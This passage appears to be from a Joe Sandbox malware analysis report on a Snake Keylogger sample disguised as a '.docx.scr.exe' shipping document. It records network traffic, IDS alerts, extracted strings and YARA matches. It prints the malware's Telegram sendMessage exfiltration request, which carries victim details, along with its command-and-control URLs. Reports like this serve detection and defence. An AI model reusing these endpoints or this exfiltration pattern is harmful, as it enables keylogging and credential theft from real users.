Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 07:33:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1729417735.0000000002971000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003344000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000333F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003375000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003366000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
